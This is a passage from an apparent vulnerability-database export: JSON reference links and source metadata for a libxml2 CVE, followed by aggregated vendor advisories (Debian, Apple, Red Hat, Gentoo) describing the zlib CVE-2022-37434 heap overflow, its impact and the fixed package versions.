"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9850"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8811"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9803"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9862"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-1551"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3885"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15503"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10018"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-1551"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8764"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3865"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3864"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14391"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3862"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3901"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.6/updating/updating-cluster"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8823"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3895"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15165"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11793"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8816"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8771"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3897"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8743"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9915"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8815"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-11068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3868"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8846"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25211"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1129"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12723"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25645"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_3scale_api_management"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28374"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14351"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25705"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_3scale_api_management/2.10/html-single/installing_3scale/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29661"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20265"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-0427"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14351"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19532"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12723"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7053"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9283"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19532"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1240"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20386"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18874"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4255"
},
{
"trust": 0.1,
"url": "https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14822"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14822"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20386"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18874"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14365"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5482"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5482"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:0949"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8177"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.4/cli_reference/openshift_developer_cli/installing-odo.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6829"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4479"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3996"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1752"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:0146"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless_applications/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24553"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24553"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10029"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24659"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28366"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28366"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28367"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28367"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-185720"
},
{
"db": "VULMON",
"id": "CVE-2020-7595"
},
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159639"
},
{
"db": "PACKETSTORM",
"id": "161016"
},
{
"db": "PACKETSTORM",
"id": "162130"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "161916"
},
{
"db": "PACKETSTORM",
"id": "159851"
},
{
"db": "PACKETSTORM",
"id": "159349"
},
{
"db": "PACKETSTORM",
"id": "160961"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
},
{
"db": "NVD",
"id": "CVE-2020-7595"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-185720",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-7595",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162694",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162142",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159639",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "161016",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162130",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159553",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "161916",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159851",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159349",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "160961",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-7595",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-01-21T00:00:00",
"db": "VULHUB",
"id": "VHN-185720",
"ident": null
},
{
"date": "2020-01-21T00:00:00",
"db": "VULMON",
"id": "CVE-2020-7595",
"ident": null
},
{
"date": "2021-05-19T14:19:18",
"db": "PACKETSTORM",
"id": "162694",
"ident": null
},
{
"date": "2021-04-09T15:06:13",
"db": "PACKETSTORM",
"id": "162142",
"ident": null
},
{
"date": "2020-10-20T20:13:39",
"db": "PACKETSTORM",
"id": "159639",
"ident": null
},
{
"date": "2021-01-19T14:45:45",
"db": "PACKETSTORM",
"id": "161016",
"ident": null
},
{
"date": "2021-04-08T14:00:00",
"db": "PACKETSTORM",
"id": "162130",
"ident": null
},
{
"date": "2020-10-14T16:52:18",
"db": "PACKETSTORM",
"id": "159553",
"ident": null
},
{
"date": "2021-03-22T15:36:55",
"db": "PACKETSTORM",
"id": "161916",
"ident": null
},
{
"date": "2020-11-04T15:29:08",
"db": "PACKETSTORM",
"id": "159851",
"ident": null
},
{
"date": "2020-09-30T15:43:22",
"db": "PACKETSTORM",
"id": "159349",
"ident": null
},
{
"date": "2021-01-15T15:06:55",
"db": "PACKETSTORM",
"id": "160961",
"ident": null
},
{
"date": "2020-01-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-965",
"ident": null
},
{
"date": "2020-01-21T23:15:13.867000",
"db": "NVD",
"id": "CVE-2020-7595",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-07-25T00:00:00",
"db": "VULHUB",
"id": "VHN-185720",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-7595",
"ident": null
},
{
"date": "2023-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-965",
"ident": null
},
{
"date": "2025-12-03T16:15:54.123000",
"db": "NVD",
"id": "CVE-2020-7595",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "libxml2 Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
}
],
"trust": 0.6
}
}
VAR-202208-0404
Vulnerability from variot - Updated: 2026-03-09 20:18

zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).
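The note above limits CVE-2022-37434 to applications that call inflateGetHeader, because that call is what hands zlib a caller-owned buffer for the gzip "extra" field. A minimal C sketch of the flaw class and its fix follows; copy_extra_field is a hypothetical helper written for illustration, not zlib's actual code.

```c
#include <string.h>

/* Hypothetical sketch of the CVE-2022-37434 flaw class: inflate() copies
 * the gzip header "extra" field into a buffer the application registered
 * via inflateGetHeader().  The unpatched code trusted the length declared
 * in the (attacker-controlled) gzip header; the fix clamps the copy to
 * the destination capacity, as done here. */
size_t copy_extra_field(unsigned char *dst, size_t dst_cap,
                        const unsigned char *extra, size_t extra_len)
{
    /* The clamp that was effectively missing: without it, a header
     * declaring a large extra field drives memcpy past the end of dst. */
    size_t n = extra_len < dst_cap ? extra_len : dst_cap;
    memcpy(dst, extra, n);
    return n; /* bytes copied: never more than dst_cap */
}
```

Applications that never call inflateGetHeader never register such a destination buffer, which is why the advisory restricts the impact to callers of that API even when the vulnerable source is bundled.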
For the stable distribution (bullseye), this problem has been fixed in version 1:1.2.11.dfsg-2+deb11u2.
We recommend that you upgrade your zlib packages.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2022-10-27-12 Additional information for
APPLE-SA-2022-10-24-5 watchOS 9.1
watchOS 9.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213491.
AppleMobileFileIntegrity Available for: Apple Watch Series 4 and later Impact: An app may be able to modify protected parts of the file system Description: This issue was addressed by removing additional entitlements. CVE-2022-42825: Mickey Jin (@patch1t)
Apple Neural Engine Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-32932: Mohamed Ghannam (@_simo36) Entry added October 27, 2022
Audio Available for: Apple Watch Series 4 and later Impact: Parsing a maliciously crafted audio file may lead to disclosure of user information Description: The issue was addressed with improved memory handling. CVE-2022-42798: Anonymous working with Trend Micro Zero Day Initiative Entry added October 27, 2022
AVEVideoEncoder Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2022-32940: ABC Research s.r.o.
CFNetwork Available for: Apple Watch Series 4 and later Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A certificate validation issue existed in the handling of WKWebView. This issue was addressed with improved validation. CVE-2022-42813: Jonathan Zhang of Open Computing Facility (ocf.berkeley.edu)
GPU Drivers Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-32947: Asahi Lina (@LinaAsahi)
Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-32924: Ian Beer of Google Project Zero
Kernel Available for: Apple Watch Series 4 and later Impact: A remote user may be able to cause kernel code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2022-42808: Zweig of Kunlun Lab
Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2022-32944: Tim Michaud (@TimGMichaud) of Moveworks.ai Entry added October 27, 2022
Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved locking. CVE-2022-42803: Xinru Chi of Pangu Lab, John Aakerblom (@jaakerblom) Entry added October 27, 2022
Kernel Available for: Apple Watch Series 4 and later Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2022-32926: Tim Michaud (@TimGMichaud) of Moveworks.ai Entry added October 27, 2022
Kernel Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: A logic issue was addressed with improved checks. CVE-2022-42801: Ian Beer of Google Project Zero Entry added October 27, 2022
Safari Available for: Apple Watch Series 4 and later Impact: Visiting a maliciously crafted website may leak sensitive data Description: A logic issue was addressed with improved state management. CVE-2022-42817: Mir Masood Ali, PhD student, University of Illinois at Chicago; Binoy Chitale, MS student, Stony Brook University; Mohammad Ghasemisharif, PhD Candidate, University of Illinois at Chicago; Chris Kanich, Associate Professor, University of Illinois at Chicago Entry added October 27, 2022
Sandbox Available for: Apple Watch Series 4 and later Impact: An app may be able to access user-sensitive data Description: An access issue was addressed with additional sandbox restrictions. CVE-2022-42811: Justin Bui (@slyd0g) of Snowflake
WebKit Available for: Apple Watch Series 4 and later Impact: Visiting a malicious website may lead to user interface spoofing Description: The issue was addressed with improved UI handling. WebKit Bugzilla: 243693 CVE-2022-42799: Jihwan Kim (@gPayl0ad), Dohyun Lee (@l33d0hyun)
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. WebKit Bugzilla: 244622 CVE-2022-42823: Dohyun Lee (@l33d0hyun) of SSD Labs
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A logic issue was addressed with improved state management. WebKit Bugzilla: 245058 CVE-2022-42824: Abdulrahman Alqabandi of Microsoft Browser Vulnerability Research, Ryan Shin of IAAI SecLab at Korea University, Dohyun Lee (@l33d0hyun) of DNSLab at Korea University
WebKit Available for: Apple Watch Series 4 and later Impact: Processing maliciously crafted web content may disclose internal states of the app Description: A correctness issue in the JIT was addressed with improved checks. WebKit Bugzilla: 242964 CVE-2022-32923: Wonyoung Jung (@nonetype_pwn) of KAIST Hacking Lab Entry added October 27, 2022
zlib Available for: Apple Watch Series 4 and later Impact: A user may be able to cause unexpected app termination or arbitrary code execution Description: This issue was addressed with improved checks. CVE-2022-37434: Evgeny Legerov CVE-2022-42800: Evgeny Legerov Entry added October 27, 2022
Additional recognition
iCloud We would like to acknowledge Tim Michaud (@TimGMichaud) of Moveworks.ai for their assistance.
Kernel We would like to acknowledge Peter Nguyen of STAR Labs, Tim Michaud (@TimGMichaud) of Moveworks.ai, Tommy Muir (@Muirey03) for their assistance.
WebKit We would like to acknowledge Maddie Stone of Google Project Zero, Narendra Bhati (@imnarendrabhati) of Suma Soft Pvt. Ltd., an anonymous researcher for their assistance.
Instructions on how to update your Apple Watch software are available at https://support.apple.com/kb/HT204641 To check the version on your Apple Watch, open the Apple Watch app on your iPhone and select "My Watch > General > About". Alternatively, on your watch, select "My Watch > General > About". All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKpQACgkQ4RjMIDke NxndmQ/9FlBich1M+naXLmjo/AyBTdlmBdFUH6cU92PspO7vrzTZl3Gl3dSjvGg0 TU7AGeAAvr278Zra0Hrm+D+w2BMAd3SSIjBXyum02lx0AGyyAFaPEDVq4CpxnqUG AEqBRrgoU9yZpTrIQXZlsnqphdv3KLVDzqqKlZjkPzIboYJ0I0c0HMP54618kx1n oBtoEEjPrIhH9LJyt37FbtgRntCzuuyistaxKGugZo4UDUt8hkHLKpYHf/5BNfWl /SaX1sy1ZJBoOezMC7/egaHPBbJRDnU3dXSQ7ON7h6w1Tc9NeUjXP0wf8BByeIko zJF5StfqfBKa3fR8wl0uM4CWDuHVtVjHAv5lWSqEQoEFoAjud+Ajjr5j3DJegVW7 Xp5Xu7W2XRR03dCM/SCQXMttr/Eu7z4EPJZD1W5y/UYH+ZwF4tq+4fxdrLOzPh4j uDLW+CWvF0d/+lVINDXzvzfQwEk77fbFJtUwL6Z5Sq95rtIL0/1OgtK/F/ODeyAX 8xYDCVdbn84K0/5K58NsvLS01XKXGISVY5yWrf3R7f69AVq7aiaaREY71pkuIwKf +aGpuOJibybGZqIOedMES/FCYuUqZF/0N7TJH8LpmlYt/T+fXjeJkupdeT+2vpcX iq3rTxsee+WgHhuR/3utIdIFZwVvgZBOadtHO6vIOQ1ce1QyLqI= =ZTUZ -----END PGP SIGNATURE-----
Description:
The rh-sso-7/sso76-openshift-rhel8 container image and rh-sso-7/sso7-rhel8-operator operator has been updated for RHEL-8 based Middleware Containers to address the following security issues. Users of these images are also encouraged to rebuild all container images that depend on these images.
Dockerfiles and scripts should be amended either to refer to this new image specifically, or to the latest image generally. Bugs fixed (https://bugzilla.redhat.com/):
2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding
2141404 - CVE-2022-3916 keycloak: Session takeover with OIDC offline refreshtokens
- JIRA issues fixed (https://issues.jboss.org/):
CIAM-4412 - Build new OCP image for rh-sso-7/sso76-openshift-rhel8
CIAM-4413 - Generate new operator bundle image for this patch
- Bugs fixed (https://bugzilla.redhat.com/):
2134010 - CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags
- JIRA issues fixed (https://issues.jboss.org/):
LOG-2674 - Many can't remove non-existent inotify watch for: /var/log/pods/xxxxxx errors in logfilesmetricexporter container.
LOG-3042 - Logging view plugin removes part of LogQL query
LOG-3049 - [release-5.5] Resources associated with collector / fluentd keep on getting recreated
LOG-3127 - The alerts are Fluentd when type=vector
LOG-3138 - [release-5.5] the content of secret elasticsearch-metrics-token is recreated continually
LOG-3175 - [release-5.5] Vector healthcheck fails when forwarding logs to Cloudwatch
LOG-3213 - must-gather is empty for logging with CLO image
LOG-3234 - [release-5.5] Loki gateway is crashing because cipher-suites are not set
LOG-3251 - [release-5.5] Adding Valid Subscription Annotation
- Bugs fixed (https://bugzilla.redhat.com/):
2129679 - clusters belong to global clusterset is not selected by placement when rescheduling
2134609 - CVE-2022-3517 nodejs-minimatch: ReDoS via the braceExpand function
2139085 - RHACM 2.6.3 images
2149181 - CVE-2022-41912 crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements
- Description:
Red Hat Advanced Cluster Management for Kubernetes 2.4.8 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. Bugs fixed (https://bugzilla.redhat.com/):
2101669 - CVE-2022-2238 search-api: SQL injection leads to remote denial of service
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
2121068 - CVE-2022-35949 nodejs: undici.request vulnerable to SSRF
2121101 - CVE-2022-35948 nodejs: undici vulnerable to CRLF via content headers
2126277 - CVE-2022-25858 terser: insecure use of regular expressions leads to ReDoS
2130745 - RHACM 2.4.8 images
- Bugs fixed (https://bugzilla.redhat.com/):
2042826 - [SNO] the replicas of ingresscontroller/default is 2 on new installed SNO private cluster
2092839 - Downward API (annotations) is missing PCI information when using the tuning metaPlugin on SR-IOV Networks
2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3)
2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3)
2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3)
2092928 - CVE-2022-26945 go-getter: command injection vulnerability
2099800 - Bump to kubernetes 1.24.6
2109487 - machine-controller is case sensitive which can lead to false/positive errors
- JIRA issues fixed (https://issues.jboss.org/):
OCPBUGS-1099 - Missing $SEARCH domain in /etc/resolve.conf for OCP v4.9.31 cluster OCPBUGS-1346 - OpenStack UPI scripts do not create server group for Computes OCPBUGS-1658 - Whereabouts should allow non default interfaces to Pod IP list [backport 4.11] OCPBUGS-1713 - Kuryr-Controller Restarting on KuryrPort with missing pod OCPBUGS-1955 - [4.11] Dual stack cluster fails on installation when multi-path routing entries exist OCPBUGS-1972 - [IPI on Baremetal] ipv6 support issue in metal3-httpd OCPBUGS-1984 - Install Helm chart form doesn't allow the user select a specific version OCPBUGS-2011 - [4.11] ironic clear_job_queue and reset_idrac pending issues OCPBUGS-2014 - CI: Backend unit tests fails because devfile registry was updated (mock response) OCPBUGS-2042 - [2102088] 4.11 CatalogSourcesUnhealthy error in subscription When upgrading ptp-operator OCPBUGS-2046 - Remove policy/v1beta1 in 4.11 and later OCPBUGS-2050 - [release-4.11] DNS operator does not reconcile the openshift-dns namespace OCPBUGS-2092 - Use floating tags in golang imagestream OCPBUGS-2112 - [release-4.11] Address e2e failures due to pod security OCPBUGS-2113 - [4.11] etcd and kube-apiserver pods get restarted due to failed liveness probes while deleting/re-creating pods on SNO OCPBUGS-2140 - member loses rights after some other user login in openid / group sync OCPBUGS-2293 - CVO skips reconciling the installed optional resources in the 4.11 to 4.12 upgrade OCPBUGS-2320 - [release-4.11] Remove namespace and name from gathered DVO metrics OCPBUGS-2451 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name OCPBUGS-2528 - dns-default pod missing "target.workload.openshift.io/management:" annotation OCPBUGS-2606 - [release-4.11] go.mod should beworking with golang-1.17 and golang-1.18 OCPBUGS-2616 - e2e-gcp-builds is permafailing OCPBUGS-2626 - Worker creation fails within provider networks (as primary and secondary) OCPBUGS-2640 - prometheus-k8s-0 
ends in CrashLoopBackOff with evel=error err="opening storage failed: /prometheus/chunks_head/000002: invalid magic number 0" on SNO after hard reboot tests OCPBUGS-2658 - [4.11] VPA E2Es fail due to CSV name mismatch OCPBUGS-2766 - 'oc login' should be robust in the face of gather failures OCPBUGS-2780 - Import: Advanced option sentence is splited into two parts and headlines has no padding OCPBUGS-449 - KubeDaemonSetRolloutStuck alert using incorrect metric in 4.9 and 4.10 OCPBUGS-526 - Prerelease report bug link should be updated to JIRA instead of Bugzilla OCPBUGS-668 - Prefer local dns does not work expectedly on OCPv4.11 OCPBUGS-673 - crio occasionally fails to start during deployment OCPBUGS-689 - [2112237] [ Cluster storage Operator 4.x(10/11) ] DefaultStorageClassController report fake message "No default StorageClass for this platform" on Alicloud, IBM OCPBUGS-744 - [4.11] Spoke BMH stuck ?provisioning? after changing a BIOS attribute via the converged workflow OCPBUGS-947 - [4.11] Rebase openshift/etcd 4.11 onto 3.5.5 OCPBUGS-955 - [2087981] PowerOnVM_Task is deprecated use PowerOnMultiVM_Task for DRS ClusterRecommendation
-
Gentoo Linux Security Advisory GLSA 202210-42
https://security.gentoo.org/
Severity: Normal
Title: zlib: Multiple vulnerabilities
Date: October 31, 2022
Bugs: #863851, #835958
ID: 202210-42
Synopsis
A buffer overflow in zlib might allow an attacker to cause remote code execution.
Background
zlib is a widely used free and patent unencumbered data compression library.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-libs/zlib < 1.2.12-r3 >= 1.2.12-r3
Description
Multiple vulnerabilities have been discovered in zlib. Please review the CVE identifiers referenced below for details.
Impact
Maliciously crafted input handled by zlib may result in remote code execution.
Workaround
There is no known workaround at this time.
Resolution
All zlib users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=sys-libs/zlib-1.2.12-r3"
References
[ 1 ] CVE-2018-25032
      https://nvd.nist.gov/vuln/detail/CVE-2018-25032
[ 2 ] CVE-2022-37434
      https://nvd.nist.gov/vuln/detail/CVE-2022-37434
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202210-42
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5

Description:
Logging Subsystem 5.5.5 - Red Hat OpenShift
Security Fix(es):
-
jackson-databind: denial of service via a large depth of nested objects (CVE-2020-36518)
-
golang: net/http: handle server errors after sending GOAWAY (CVE-2022-27664)
-
